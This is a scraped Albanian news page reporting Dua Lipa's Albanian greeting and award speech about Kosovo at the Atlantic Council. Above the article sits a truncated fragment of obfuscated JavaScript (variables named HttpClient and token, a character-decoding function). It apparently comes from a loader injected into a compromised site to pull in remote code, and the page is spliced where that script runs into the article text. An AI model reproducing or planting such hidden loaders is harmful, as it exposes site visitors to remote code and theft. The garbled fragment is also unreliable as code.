;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Si e themi në Kosovë, Mirmrama” – Kështu e nisi Dua Lipa fjalimin në Këshillin Atlantik

By

Dua Lipa e ka nisur fjalimin e saj në Këshillin Atlantik në Amerikë, në gjuhën shqipe.

Ndërsa doli në skenë për të folur rreth Kosovës, ajo përshëndeti të pranishmit duke thënë: “Siç e themi në Kosovë, Mirmrama”.

Këngëtarja me origjinë shqiptare, jashtëzakonisht e famshme në botë, ka shprehur mirënjohje për çmimin që morri duke thënë se ia dedikon të rinjve të Kosovës.

Lipa mes tjerash foli për atdheun me shumë emocion, duke thënë: “A nuk do të ishte e përshtatshme nëse Kosova do të mund të zinte vendin e saj brenda atij bashkimi paqësor, të lulëzonte ekonomikisht përkrah fqinjëve tanë dhe të shëronte dhimbjen e konfliktit? Me këtë vizion në mendje, unë e pranoj këtë çmim me mirënjohje për të gjithë të rinjtë e Kosovës”.

Këshilli Atlantik u ndau çmime individëve shembullorë që kanë kontribuar në misionin e këtij organi për të formësuar së bashku të ardhmen globale në një gamë të gjerë fushash.

Artikuj të ngjashëm